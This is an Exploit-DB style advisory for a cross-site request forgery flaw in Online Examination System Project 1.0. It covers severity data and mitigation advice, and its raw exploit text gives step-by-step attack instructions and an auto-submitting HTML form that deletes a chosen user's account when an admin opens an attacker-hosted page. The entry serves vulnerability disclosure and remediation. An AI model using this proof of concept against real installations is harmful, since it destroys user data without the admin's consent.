Online Examination System Project 1.0 - Cross-site request forgery (CSRF)

vendor:

Online Examination System Project

by:

Ramil Mustafayev (kryptohaker)

7.5

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Online Examination System Project

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:projectworldsofficial:online_examination_system_project:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28

2023

Online Examination System Project 1.0 – Cross-site request forgery (CSRF)

Online Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin’s consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data.

Mitigation:

To mitigate this vulnerability, the application should implement CSRF protection mechanisms, such as using anti-CSRF tokens or checking the referer header. Additionally, sensitive operations like account deletion should be performed using POST requests instead of GET requests.

Source

Exploit-DB raw data:

# Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF)
# Google Dork: n/a
# Date: 09/06/2023
# Exploit Author: Ramil Mustafayev (kryptohaker)
# Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
# CVE : n/a

Online Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin’s consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data.

To exploit this vulnerability, an attacker needs to do the following:

1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/
2. Identify the email address of a user account that the attacker wants to delete. For example, victim@example.com
3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example:

<html>
  <body>
    <form action="http://example.com/update.php" method="GET">
      <input type="hidden" name="demail" value="victim@example.com" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html
5. Send the URL of the HTML page to the admin user via email, social media, or any other means.

If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin’s consent or knowledge.